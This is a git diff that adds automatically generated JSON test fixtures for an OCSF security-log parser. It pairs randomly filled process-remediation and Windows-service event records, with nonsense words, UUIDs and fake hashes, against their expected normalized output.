thinking males\"}, \"scan\": {\"name\": \"soon reproduce paragraph\", \"type\": \"Updated Content\", \"uid\": \"28d22ac4-a02f-11ef-a4e4-0242ac110007\", \"type_id\": 3}, \"severity\": \"Informational\", \"category_uid\": 7, \"activity_id\": 0, \"type_uid\": 700300, \"type_name\": \"Process Remediation Activity: Unknown\", \"observables\": [{\"name\": \"targeted arlington mediterranean\", \"type\": \"Geo Location\", \"type_id\": 26, \"reputation\": {\"base_score\": 94.8029, \"provider\": \"lucy printing mrna\", \"score\": \"turkish\", \"score_id\": 99}}, {\"name\": \"payment traditions proudly\", \"type\": \"CVE Object: uid\", \"type_id\": 18}], \"category_name\": \"Remediation\", \"class_uid\": 7003, \"class_name\": \"Process Remediation Activity\", \"timezone_offset\": 14, \"activity_name\": \"Unknown\", \"command_uid\": \"28d355b6-a02f-11ef-b6de-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"28d23d02-a02f-11ef-97ab-0242ac110007\"}, \"d3f_technique\": {\"name\": \"dosage cart but\", \"uid\": \"28d29040-a02f-11ef-b946-0242ac110007\"}}, {\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"28d29c02-a02f-11ef-9d6f-0242ac110007\"}, \"d3f_technique\": {\"uid\": \"28d2cb6e-a02f-11ef-a981-0242ac110007\", \"src_url\": \"amsterdam\"}}], \"severity_id\": 1, \"status_detail\": \"bow euros scsi\"}" + }, + "expected": { + "message": "{\"message\": \"sellers besides hl\", \"process\": {\"name\": \"Prince\", \"pid\": 7, \"file\": {\"name\": \"propose.pptx\", \"type\": \"Folder\", \"signature\": {\"algorithm\": \"DSA\", \"algorithm_id\": 1}, \"modifier\": {\"name\": \"Stylish\", \"type\": \"Unknown\", \"uid\": \"28d3fd18-a02f-11ef-af24-0242ac110007\", \"type_id\": 0, \"ldap_person\": {\"employee_uid\": \"28d42ee6-a02f-11ef-9279-0242ac110007\"}, \"risk_level\": \"loving\", \"risk_level_id\": 99, \"risk_score\": 0}, \"desc\": \"ceiling patches side\", \"uid\": \"28d43742-a02f-11ef-9ec1-0242ac110007\", \"type_id\": 2, \"creator\": {\"name\": \"Remained\", \"type\": \"latino\", \"domain\": \"rest investor soa\", \"uid\": \"28d473e2-a02f-11ef-9ccb-0242ac110007\", \"type_id\": 99}, \"hashes\": [{\"value\": \"89759E1284E2479B991D2669DE104942\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"C19F43EB415F38C482F5CB26B9720DA398AA56B47B415867BBA7F118EB0D89D563350BA26D579DC834B11828F7E929E3AD3F14B90D86D0610F44E088AD1F2B64\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}]}, \"user\": {\"name\": \"Pork\", \"type\": \"User\", \"uid\": \"28d4888c-a02f-11ef-82fc-0242ac110007\", \"type_id\": 1, \"ldap_person\": {\"location\": {\"desc\": \"Dominica, Commonwealth of\", \"city\": \"Discrimination fri\", \"country\": \"DM\", \"coordinates\": [92.1251, 34.7562], \"continent\": \"North America\"}, \"manager\": {\"name\": \"Idol\", \"type\": \"Admin\", \"uid\": \"28d4cb94-a02f-11ef-b90f-0242ac110007\", \"type_id\": 2, \"risk_level\": \"gothic smithsonian garmin\"}, \"employee_uid\": \"28d4d544-a02f-11ef-ad52-0242ac110007\", \"given_name\": \"includes livestock index\", \"job_title\": \"strategies compliant references\", \"leave_time\": 1731330988071, \"modified_time\": 1731330988071}, \"uid_alt\": \"control gary baking\"}, \"tid\": 47, \"uid\": \"28d4de90-a02f-11ef-98b9-0242ac110007\", \"cmd_line\": \"characters vocal tracy\", \"created_time\": 1731330988072, \"parent_process\": {\"pid\": 40, \"file\": {\"attributes\": 79, \"name\": \"irc.com\", \"type\": \"Unknown\", \"path\": \"finding possibilities clinton/cached.asf/irc.com\", \"signature\": {\"state\": \"Revoked\", \"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"external compiler heated\", \"issuer\": \"appears hungry drive\", \"fingerprints\": [{\"value\": \"63F62E392F7025A4167DD1EC5A9EF966C16729FDC201CB89B807A60D5332A7A9473433A7AE2CD8C213C47520CFCDF970F3EA2DFEF02D04EA5B66610BDEA8D497\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"created_time\": 1731330988072, \"expiration_time\": 1731330988072, \"serial_number\": \"configuration deadline calgary\"}, \"algorithm\": \"fails\", \"algorithm_id\": 99, \"state_id\": 3}, \"modifier\": {\"type\": \"User\", \"uid\": \"28d51ef0-a02f-11ef-92f3-0242ac110007\", \"type_id\": 1, \"email_addr\": \"Yu@monroe.mil\"}, \"ext\": \"consequences years ecology\", \"type_id\": 0, \"parent_folder\": \"finding possibilities clinton/cached.asf\", \"hashes\": [{\"value\": \"A6426312E27AB008F4EDC3204E03FD5B383EA1C8B4A4567E748A42CEF025EF43A89764E99A4D39740137733A152598B7050663A2C427F7874F331D0609FD3CB8\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"EACCA81A25CF539B76C8A39BB632EC20C918EF9EFD1E73B8FDEB68C67765DE58E5925C523C695E88ACB94E43C38BA494EFF4D1A415A91C332930A3FB12A5AF27\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}]}, \"user\": {\"type\": \"Unknown\", \"uid\": \"28d53156-a02f-11ef-aa73-0242ac110007\", \"type_id\": 0}, \"tid\": 51, \"uid\": \"28d53f16-a02f-11ef-9a1e-0242ac110007\", \"cmd_line\": \"commission relying steady\", \"created_time\": 1731330988074, \"integrity\": \"Medium\", \"integrity_id\": 3, \"parent_process\": {\"pid\": 56, \"session\": {\"terminal\": \"occur match lan\", \"uid\": \"28d58f84-a02f-11ef-8740-0242ac110007\", \"created_time\": 1731330988076, \"expiration_reason\": \"therapeutic midlands visited\", \"is_remote\": true}, \"file\": {\"attributes\": 47, \"name\": \"anymore.tar\", \"owner\": {\"name\": \"Halifax\", \"type\": \"User\", \"type_id\": 1, \"risk_level\": \"Medium\", \"risk_level_id\": 2}, \"type\": \"Regular File\", \"uid\": \"28d5c4cc-a02f-11ef-8469-0242ac110007\", \"type_id\": 1, \"hashes\": [{\"value\": \"F573102FF9F85CEA0795FA811907D06B74C86CDE18D2999A2070523EC27478C2F15F634D3D0509B660995C0695E665C4A124CD5F1F657FD9E26AC679200F1425\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}], \"modified_time\": 1731330988078, \"security_descriptor\": \"realtors shoulder kilometers\", \"xattributes\": {}}, \"user\": {\"name\": \"Figured\", \"type\": \"System\", \"uid\": \"28d5fac8-a02f-11ef-895f-0242ac110007\", \"type_id\": 3, \"credential_uid\": \"28d602ac-a02f-11ef-9c04-0242ac110007\", \"email_addr\": \"Darla@movies.org\"}, \"uid\": \"28d63402-a02f-11ef-b1e9-0242ac110007\", \"cmd_line\": \"overview statutes valves\", \"created_time\": 1731330988080, \"integrity\": \"losses renewal aquatic\"}}}, \"status\": \"dynamic acer dollar\", \"time\": 1731330988061, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"diamond aaa screensavers\", \"version\": \"1.3.0\", \"path\": \"mem anthropology notifications\", \"uid\": \"28d1a536-a02f-11ef-92c5-0242ac110007\", \"cpe_name\": \"quebec labs assume\", \"vendor_name\": \"professionals subsidiary maria\"}, \"labels\": [\"bandwidth\", \"jeremy\"], \"profiles\": [], \"event_code\": \"digit\", \"log_name\": \"bosnia blind seq\", \"log_provider\": \"arg handed dock\", \"log_version\": \"congratulations solution vancouver\", \"original_time\": \"famous thinking males\"}, \"scan\": {\"name\": \"soon reproduce paragraph\", \"type\": \"Updated Content\", \"uid\": \"28d22ac4-a02f-11ef-a4e4-0242ac110007\", \"type_id\": 3}, \"severity\": \"Informational\", \"category_uid\": 7, \"activity_id\": 0, \"type_uid\": 700300, \"type_name\": \"Process Remediation Activity: Unknown\", \"observables\": [{\"name\": \"targeted arlington mediterranean\", \"type\": \"Geo Location\", \"type_id\": 26, \"reputation\": {\"base_score\": 94.8029, \"provider\": \"lucy printing mrna\", \"score\": \"turkish\", \"score_id\": 99}}, {\"name\": \"payment traditions proudly\", \"type\": \"CVE Object: uid\", \"type_id\": 18}], \"category_name\": \"Remediation\", \"class_uid\": 7003, \"class_name\": \"Process Remediation Activity\", \"timezone_offset\": 14, \"activity_name\": \"Unknown\", \"command_uid\": \"28d355b6-a02f-11ef-b6de-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"28d23d02-a02f-11ef-97ab-0242ac110007\"}, \"d3f_technique\": {\"name\": \"dosage cart but\", \"uid\": \"28d29040-a02f-11ef-b946-0242ac110007\"}}, {\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"28d29c02-a02f-11ef-9d6f-0242ac110007\"}, \"d3f_technique\": {\"uid\": \"28d2cb6e-a02f-11ef-a981-0242ac110007\", \"src_url\": \"amsterdam\"}}], \"severity_id\": 1, \"status_detail\": \"bow euros scsi\"}", + "event": { + "action": "unknown", + "category": [], + "code": "digit", + "provider": "arg handed dock", + "reason": "sellers besides hl", + "severity": 1, + "type": [] + }, + "@timestamp": "2024-11-11T13:16:28.061000Z", + "file": { + "hash": { + "md5": "89759E1284E2479B991D2669DE104942", + "ssdeep": "C19F43EB415F38C482F5CB26B9720DA398AA56B47B415867BBA7F118EB0D89D563350BA26D579DC834B11828F7E929E3AD3F14B90D86D0610F44E088AD1F2B64" + }, + "inode": "28d43742-a02f-11ef-9ec1-0242ac110007", + "name": "propose.pptx", + "type": "Folder" + }, + "ocsf": { + "activity_id": 0, + "activity_name": "Unknown", + "class_name": "Process Remediation Activity", + "class_uid": 7003 + }, + "process": { + "command_line": "characters vocal tracy", + "entity_id": "28d4de90-a02f-11ef-98b9-0242ac110007", + "name": "Prince", + "parent": { + "command_line": "commission relying steady", + "entity_id": "28d53f16-a02f-11ef-9a1e-0242ac110007", + "pid": 40, + "start": "2024-11-11T13:16:28.074000Z", + "thread": { + "id": 51 + }, + "user": { + "id": [ + "28d53156-a02f-11ef-aa73-0242ac110007" + ] + } + }, + "pid": 7, + "start": "2024-11-11T13:16:28.072000Z", + "thread": { + "id": 47 + }, + "user": { + "id": [ + "28d4888c-a02f-11ef-82fc-0242ac110007" + ], + "name": "Pork" + } + }, + "related": { + "hash": [ + "89759E1284E2479B991D2669DE104942", + "C19F43EB415F38C482F5CB26B9720DA398AA56B47B415867BBA7F118EB0D89D563350BA26D579DC834B11828F7E929E3AD3F14B90D86D0610F44E088AD1F2B64" + ] + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_windows_service_1.json b/OCSF/ocsf/tests/generated_windows_service_1.json new file mode 100644 index 000000000..c474de045 --- /dev/null +++ b/OCSF/ocsf/tests/generated_windows_service_1.json @@ -0,0 +1,97 @@ +{ + "input": { + "message": "{\"message\": \"gear technologies garlic\", \"status\": \"Failure\", \"time\": 1731399707936, \"device\": {\"owner\": {\"name\": \"Paper\", \"type\": \"Unknown\", \"domain\": \"comfort pick casino\", \"uid\": \"29093ba4-a0cf-11ef-a993-0242ac110007\", \"type_id\": 0, \"credential_uid\": \"2909420c-a0cf-11ef-ae57-0242ac110007\"}, \"type\": \"IDS\", \"uid\": \"29092d44-a0cf-11ef-8baa-0242ac110007\", \"type_id\": 13, \"imei\": \"polyester verified charlie\", \"instance_uid\": \"29091d04-a0cf-11ef-8935-0242ac110007\", \"interface_name\": \"fonts roller schema\", \"interface_uid\": \"290925c4-a0cf-11ef-83a0-0242ac110007\", \"is_managed\": true, \"network_interfaces\": [{\"name\": \"nickname museums symptoms\", \"type\": \"Unknown\", \"hostname\": \"influenced.museum\", \"mac\": \"25:15:EA:C3:5F:12:EF:E9\", \"type_id\": 0}, {\"name\": \"polar bm traveler\", \"type\": \"Wired\", \"hostname\": \"vegetarian.store\", \"mac\": \"87:8C:2:BD:DD:A8:43:3A\", \"type_id\": 1}], \"region\": \"provider nirvana absolute\", \"risk_level\": \"Critical\", \"risk_level_id\": 4}, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"pokemon know retrieval\", \"version\": \"1.3.0\", \"path\": \"dolls vid representing\", \"uid\": \"290890b4-a0cf-11ef-b8db-0242ac110007\", \"vendor_name\": \"hide broken trademark\"}, \"profiles\": [], \"log_name\": \"cindy drives thin\", \"log_provider\": \"foo canada biodiversity\", \"original_time\": \"virus pure partly\", \"processed_time\": 1731399707888}, \"start_time\": 1731399707936, \"severity\": \"Medium\", \"category_uid\": 1, \"activity_id\": 4, \"type_uid\": 20100404, \"type_name\": \"Windows Service Activity: Stop\", \"observables\": [{\"name\": \"generation damages hawaii\", \"type\": \"Email\", \"value\": \"sale talking pairs\", \"type_id\": 22}, {\"name\": \"testimonials seventh smallest\", \"type\": \"MAC Address\", \"type_id\": 3}], \"category_name\": \"System Activity\", \"class_uid\": 201004, \"class_name\": \"Windows Service Activity\", \"timezone_offset\": 72, \"activity_name\": \"Stop\", \"actor\": {\"process\": {\"name\": \"Don\", \"pid\": 38, \"file\": {\"name\": \"developmental.otf\", \"type\": \"Regular File\", \"path\": \"vg tunisia river/favorite.wsf/developmental.otf\", \"ext\": \"mike biography serial\", \"type_id\": 1, \"accessor\": {\"name\": \"Mathematical\", \"type\": \"Unknown\", \"domain\": \"touring wing sunglasses\", \"org\": {\"name\": \"battery met word\", \"uid\": \"29099612-a0cf-11ef-9f88-0242ac110007\", \"ou_name\": \"invitation olympus putting\"}, \"type_id\": 0, \"credential_uid\": \"29099f68-a0cf-11ef-ab1c-0242ac110007\", \"risk_level\": \"constitution missions steam\"}, \"parent_folder\": \"vg tunisia river/favorite.wsf\", \"confidentiality\": \"Top Secret\", \"confidentiality_id\": 4, \"hashes\": [{\"value\": \"9280AE13A255F18D841739D0D18222BB950C8FC7\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}], \"security_descriptor\": \"gibson columbia refund\"}, \"user\": {\"name\": \"Journal\", \"type\": \"System\", \"domain\": \"tuition gst cheese\", \"uid\": \"2909b99e-a0cf-11ef-946c-0242ac110007\", \"groups\": [{\"name\": \"overview friendly ul\", \"desc\": \"spent richards molecular\", \"privileges\": [\"gale suicide combo\"]}], \"type_id\": 3, \"full_name\": \"Lynsey Sherise\"}, \"uid\": \"2909c8d0-a0cf-11ef-82af-0242ac110007\", \"cmd_line\": \"hdtv il murder\", \"created_time\": 1731399707895, \"parent_process\": {\"name\": \"Indoor\", \"pid\": 29, \"session\": {\"terminal\": \"eternal armor maternity\", \"uid\": \"290a04bc-a0cf-11ef-9799-0242ac110007\", \"uuid\": \"290a0af2-a0cf-11ef-8713-0242ac110007\", \"issuer\": \"troubleshooting footage pour\", \"created_time\": 1731399707897}, \"file\": {\"attributes\": 81, \"name\": \"submitted.cpp\", \"owner\": {\"name\": \"Reverse\", \"type\": \"Unknown\", \"domain\": \"wiki ba evaluating\", \"uid\": \"290a2bea-a0cf-11ef-a2af-0242ac110007\", \"type_id\": 0, \"email_addr\": \"Bessie@outcomes.pro\", \"risk_level\": \"plenty sarah preparation\"}, \"size\": 2618568753, \"type\": \"Local Socket\", \"version\": \"1.3.0\", \"path\": \"annually chapters country/separately.pdf/submitted.cpp\", \"modifier\": {\"name\": \"Appraisal\", \"type\": \"Admin\", \"uid\": \"290a3a2c-a0cf-11ef-96ea-0242ac110007\", \"type_id\": 2}, \"desc\": \"deeply dresses hills\", \"ext\": \"scholarships fundraising hydrocodone\", \"type_id\": 5, \"company_name\": \"Galen Nakita\", \"parent_folder\": \"annually chapters country/separately.pdf\", \"accessed_time\": 1731399707898, \"hashes\": [{\"value\": \"9E2FB759708B9621D802CC03D5DA0C1600A80AE7A740A0840F232C31B6E61F01EE5CF00A1719E67BEC538182D8A3074DA5123670601506065A44D4E8AC2C4CB2\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"xattributes\": {}}, \"user\": {\"name\": \"Asian\", \"type\": \"Unknown\", \"uid\": \"290a520a-a0cf-11ef-a44f-0242ac110007\", \"type_id\": 0, \"full_name\": \"Roland Nichol\", \"account\": {\"name\": \"girl sugar benefit\", \"type\": \"Azure AD Account\", \"uid\": \"290a5ef8-a0cf-11ef-809f-0242ac110007\", \"labels\": [\"complex\"], \"type_id\": 6}, \"credential_uid\": \"290a66e6-a0cf-11ef-a28e-0242ac110007\", \"uid_alt\": \"transportation vegetables debian\"}, \"uid\": \"290a756e-a0cf-11ef-86a9-0242ac110007\", \"cmd_line\": \"bull retailers sensitivity\", \"created_time\": 1731399707900, \"lineage\": [\"george herein ghz\"], \"parent_process\": {\"name\": \"Broader\", \"pid\": 50, \"file\": {\"name\": \"vegetation.tif\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"leonard accent told/determine.sdf/vegetation.tif\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"traffic changes calm\", \"issuer\": \"give img nsw\", \"fingerprints\": [{\"value\": \"7245C357B5BE2E81CFA6582A9CEF4108E8E9BC9E4DA47D108C495262F1EE943BB741CFFE5FDDEE5B3AD441498918E714FF20108B4CDDEDE100B8AD003E7DDA73\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"created_time\": 1731399707900, \"serial_number\": \"blades mike seal\"}, \"algorithm\": \"Authenticode\", \"algorithm_id\": 4}, \"desc\": \"electronics charges gallery\", \"ext\": \"disorder agriculture anger\", \"type_id\": 1, \"company_name\": \"Billie Shawnee\", \"mime_type\": \"briefly/entirely\", \"parent_folder\": \"leonard accent told/determine.sdf\", \"created_time\": 1731399707900, \"hashes\": [{\"value\": \"0947FCC917EB1D3C89AD818BEB61E3B2C3CF3BBA\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"CEE604715F44D7CD732D46B9B349EC7911E55D19C6E598E8064B403337EB8F9EA9E58A34D42BA046D72E529215E7D8E2AB68DA5552324343DA54BF3220615F0A\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}], \"modified_time\": 1731399707900}, \"user\": {\"name\": \"Markers\", \"type\": \"Unknown\", \"uid\": \"290a9f62-a0cf-11ef-b0c9-0242ac110007\", \"groups\": [{\"name\": \"foul administrative owns\", \"uid\": \"290aaa98-a0cf-11ef-a3a1-0242ac110007\"}, {\"name\": \"develop houston gamma\", \"uid\": \"290ab498-a0cf-11ef-80bd-0242ac110007\", \"privileges\": [\"shade bell link\", \"processor code ashley\"]}], \"type_id\": 0, \"account\": {\"type\": \"AWS Account\", \"uid\": \"290abf42-a0cf-11ef-a831-0242ac110007\", \"type_id\": 10}}, \"uid\": \"290ac5dc-a0cf-11ef-a78c-0242ac110007\", \"cmd_line\": \"studies un checking\", \"created_time\": 1731399707902, \"integrity\": \"Unknown\", \"integrity_id\": 0, \"lineage\": [\"commodity config charges\", \"wikipedia las relatives\"], \"parent_process\": {\"name\": \"Eyed\", \"pid\": 59, \"user\": {\"name\": \"Louisiana\", \"type\": \"System\", \"uid\": \"290b1514-a0cf-11ef-9bd3-0242ac110007\", \"type_id\": 3, \"credential_uid\": \"290b1cbc-a0cf-11ef-8f91-0242ac110007\", \"risk_level\": \"Info\", \"risk_level_id\": 0}, \"uid\": \"290b241e-a0cf-11ef-89bc-0242ac110007\", \"cmd_line\": \"skins shipments proteins\", \"created_time\": 1731399707904, \"parent_process\": {\"name\": \"Almost\", \"pid\": 53, \"user\": {\"name\": \"Subscription\", \"type\": \"User\", \"domain\": \"lion aims yukon\", \"uid\": \"290b388c-a0cf-11ef-81e2-0242ac110007\", \"type_id\": 1}, \"uid\": \"290b3f44-a0cf-11ef-856f-0242ac110007\", \"cmd_line\": \"bidding lauren confusion\", \"created_time\": 1731399707905, \"parent_process\": {\"name\": \"Word\", \"pid\": 11, \"session\": {\"count\": 9, \"issuer\": \"practice attempt court\", \"created_time\": 1731399707905, \"is_remote\": true, \"is_vpn\": true}, \"file\": {\"attributes\": 44, \"name\": \"consistency.sln\", \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"handbags camera urgent/forecast.gz/consistency.sln\", \"ext\": \"entity fe blocking\", \"type_id\": 3, \"parent_folder\": \"handbags camera urgent/forecast.gz\", \"hashes\": [{\"value\": \"6D17DA8FAF5A7C8BD04AFB00506B03897D0DE6A8D7B4EBD644B680ACB98A1CFE8924C0F11BCCA03BFC8D47BE350C1C8A20AF62D4E02D978CB8159FB2D49086A7\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"BE412112026B3DCAEC7BE421BA9D884A2FBC5C9795F336CCBD0E8C76BFF312AA3BAFBB4BA71F540A076F5C0D8189254B397357A086D5B86B7D794FDCE6FCCFC1\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"is_system\": true}, \"user\": {\"type\": \"Unknown\", \"uid\": \"290b69f6-a0cf-11ef-a847-0242ac110007\", \"type_id\": 0}, \"uid\": \"290b720c-a0cf-11ef-a98d-0242ac110007\", \"cmd_line\": \"fears demanding stewart\", \"created_time\": 1731399707906, \"integrity\": \"High\", \"integrity_id\": 4, \"parent_process\": {\"name\": \"Kinds\", \"pid\": 63, \"session\": {\"uid\": \"290b83d2-a0cf-11ef-9629-0242ac110007\", \"uuid\": \"290b89cc-a0cf-11ef-89ef-0242ac110007\", \"issuer\": \"tray lying x\", \"created_time\": 1731399707907, \"is_remote\": true}, \"file\": {\"name\": \"concerns.cab\", \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"faq payable progressive/part.m3u/concerns.cab\", \"ext\": \"imported supplements prepaid\", \"type_id\": 3, \"mime_type\": \"garmin/popularity\", \"parent_folder\": \"faq payable progressive/part.m3u\", \"hashes\": [{\"value\": \"E8A5CF21ECCC4DB4DAAFDD5BD0140861637D937597AD8EE0246E0715031FE6BDABB4F5B16FDDCACD9722B57A18B46453B01D984E3D55292FB82825C3A06E516A\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}, {\"value\": \"4B9E4636494461CF31094E9A16F456FE\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}]}, \"user\": {\"type\": \"remarkable\", \"type_id\": 99, \"full_name\": \"Jennell Sidney\", \"email_addr\": \"Clayton@scanned.travel\", \"ldap_person\": {\"location\": {\"desc\": \"Monaco, Principality of\", \"city\": \"Phil clarity\", \"country\": \"MC\", \"coordinates\": [113.7672, 53.7852], \"continent\": \"Europe\"}, \"given_name\": \"rachel trio electronics\", \"ldap_cn\": \"accessory fancy shelter\"}}, \"uid\": \"290babfa-a0cf-11ef-a1ee-0242ac110007\", \"cmd_line\": \"tuner clara concepts\", \"created_time\": 1731399707908, \"integrity\": \"boxes x day\", \"parent_process\": {\"name\": \"Animated\", \"pid\": 43, \"file\": {\"name\": \"pgp.rom\", \"type\": \"Symbolic Link\", \"path\": \"percent obtaining influenced/liked.bmp/pgp.rom\", \"signature\": {\"digest\": {\"value\": \"0A6CFE12D4BE13BD525E0097949ED52B4E032606B7BF98076581F2189F23342568BE12B631EF1F25F82E1979FC852ECA24E8A38B319B071638C3153E4DA60740\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, \"certificate\": {\"version\": \"1.3.0\", \"uid\": \"290bcd06-a0cf-11ef-8f86-0242ac110007\", \"is_self_signed\": true, \"subject\": \"brilliant follow county\", \"issuer\": \"suppliers workout deposit\", \"fingerprints\": [{\"value\": \"03114C6B1064C1C04AE3C88FA18F582A2228B88A7786BBFCBCE275DED7A5C23A\", \"algorithm\": \"magic\", \"algorithm_id\": 99}, {\"value\": \"F07D26D3B025D5EF30B38458926092E990C3B6F0BE1A23B561D778E8467319E0444B2425FDEDB91121554B8641B06B3654426F63C9C0435C6487571DC9AE0FC5\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}], \"created_time\": 1731399707908, \"expiration_time\": 1731399707909, \"serial_number\": \"hazard compaq emirates\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0, \"created_time\": 1731399707909}, \"type_id\": 7, \"accessor\": {\"name\": \"Athletes\", \"type\": \"System\", \"uid\": \"290bdfe4-a0cf-11ef-88a6-0242ac110007\", \"org\": {\"name\": \"publicity porsche shoulder\", \"uid\": \"290bebf6-a0cf-11ef-bcbf-0242ac110007\", \"ou_name\": \"wins separate lemon\"}, \"groups\": [{\"name\": \"jose quotes toolbar\", \"uid\": \"290c038e-a0cf-11ef-beec-0242ac110007\"}], \"type_id\": 3, \"email_addr\": \"Sherry@machinery.store\", \"risk_level\": \"Low\", \"risk_level_id\": 1, \"risk_score\": 25}, \"company_name\": \"Lashell Vincent\", \"mime_type\": \"representing/lee\", \"parent_folder\": \"percent obtaining influenced/liked.bmp\", \"hashes\": [{\"value\": \"E2F3E36EA43BA45AB3503CED0A944CD1A950065C\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"37DB034AE21206C4451CA1E72F6D031F77B7D0A27FF50009CFBECB868E7DE5C6\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"security_descriptor\": \"october surrey en\"}, \"uid\": \"290c11c6-a0cf-11ef-90cb-0242ac110007\", \"cmd_line\": \"wires wheels mf\", \"created_time\": 1731399707910, \"parent_process\": {\"name\": \"Petite\", \"pid\": 26, \"file\": {\"name\": \"difficulty.deskthemepack\", \"owner\": {\"name\": \"Costa\", \"type\": \"Unknown\", \"uid\": \"290c33c2-a0cf-11ef-87c6-0242ac110007\", \"type_id\": 0, \"ldap_person\": {\"manager\": {\"name\": \"Genetics\", \"type\": \"User\", \"domain\": \"gotta shades electron\", \"type_id\": 1, \"account\": {\"name\": \"hood consortium conversion\", \"type\": \"Windows Account\", \"uid\": \"290c4970-a0cf-11ef-8a6a-0242ac110007\", \"labels\": [\"dose\"], \"type_id\": 2}, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"created_time\": 1731399707912, \"job_title\": \"bestsellers exactly diffs\", \"leave_time\": 1731399707912, \"surname\": \"responded pasta killed\"}}, \"type\": \"Symbolic Link\", \"path\": \"dimensions achieving ordinary/painting.sys/difficulty.deskthemepack\", \"product\": {\"name\": \"implications pizza christmas\", \"version\": \"1.3.0\", \"uid\": \"290c597e-a0cf-11ef-b883-0242ac110007\", \"vendor_name\": \"amateur faith fell\"}, \"uid\": \"290c6086-a0cf-11ef-90f6-0242ac110007\", \"ext\": \"transexuales sas operate\", \"type_id\": 7, \"accessor\": {\"name\": \"Giants\", \"type\": \"System\", \"domain\": \"pressure girl facility\", \"uid\": \"290c722e-a0cf-11ef-b5e2-0242ac110007\", \"type_id\": 3, \"full_name\": \"Marcene Goldie\", \"risk_score\": 35}, \"parent_folder\": \"dimensions achieving ordinary/painting.sys\", \"confidentiality\": \"Restricted\", \"confidentiality_id\": 6, \"created_time\": 1731399707913, \"hashes\": [{\"value\": \"B7B6604452EAF6AB6947459B4FA35CDFDCA39605BF415F77DDD90B47B7AE74ACC2BD0AB274FFC18792A7B43A7EE661EA8098EA69E1D0483392690A4D0BFFA60D\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"is_system\": true, \"xattributes\": {}}, \"user\": {\"type\": \"eau\", \"domain\": \"meaning feedback jan\", \"uid\": \"290c8624-a0cf-11ef-97f7-0242ac110007\", \"type_id\": 99, \"credential_uid\": \"290c8e30-a0cf-11ef-9434-0242ac110007\"}, \"created_time\": 1731399707913, \"parent_process\": {\"name\": \"Yards\", \"pid\": 15, \"file\": {\"name\": \"williams.xhtml\", \"type\": \"Folder\", \"path\": \"thailand diameter love/rachel.java/williams.xhtml\", \"signature\": {\"state\": \"diffs seasons conflicts\", \"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"ethernet suitable brandon\", \"issuer\": \"optimization earliest differently\", \"fingerprints\": [{\"value\": \"BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"DEE5E5BE829C1FF9E773E27CDA4A8960CAB5C8A6F392DA6ACCBACB430B13B9BC64822221325357EAA87B60D5F4474090332CD89561EBEC061294834301DF9AE9\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"created_time\": 1731399707914, \"expiration_time\": 1731399707914, \"serial_number\": \"photographer tax up\"}, \"algorithm\": \"RSA\", \"algorithm_id\": 2}, \"uid\": \"290cc5f8-a0cf-11ef-92a0-0242ac110007\", \"ext\": \"alien cafe barriers\", \"type_id\": 2, \"parent_folder\": \"thailand diameter love/rachel.java\", \"confidentiality\": \"Private\", \"confidentiality_id\": 5, \"hashes\": [{\"value\": \"2B831F21DC87C2B301C73A0ACE1A47E607F1C5210E766355BD25B4E47948BBB20B677EE6C92C70765B352A0CCC29C89AB8D8D3489DEE0CCD7EDE26C6BDF6508F\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"security_descriptor\": \"se diabetes vitamin\"}, \"user\": {\"name\": \"Caps\", \"type\": \"System\", \"uid\": \"290cd5ca-a0cf-11ef-80bf-0242ac110007\", \"type_id\": 3, \"full_name\": \"Eve Roger\", \"account\": {\"name\": \"clearing deviant confidential\", \"type\": \"Apple Account\", \"uid\": \"290ce038-a0cf-11ef-8ee9-0242ac110007\", \"type_id\": 8}, \"email_addr\": \"Renda@antivirus.int\", \"uid_alt\": \"forced jvc archives\"}, \"uid\": \"290ce786-a0cf-11ef-9fc4-0242ac110007\", \"cmd_line\": \"reuters revolution thermal\", \"created_time\": 1731399707916, \"lineage\": [\"settled household february\", \"countries implemented chinese\"], \"parent_process\": {\"name\": \"Unions\", \"pid\": 41, \"file\": {\"name\": \"groups.part\", \"size\": 2002602281, \"type\": \"Character Device\", 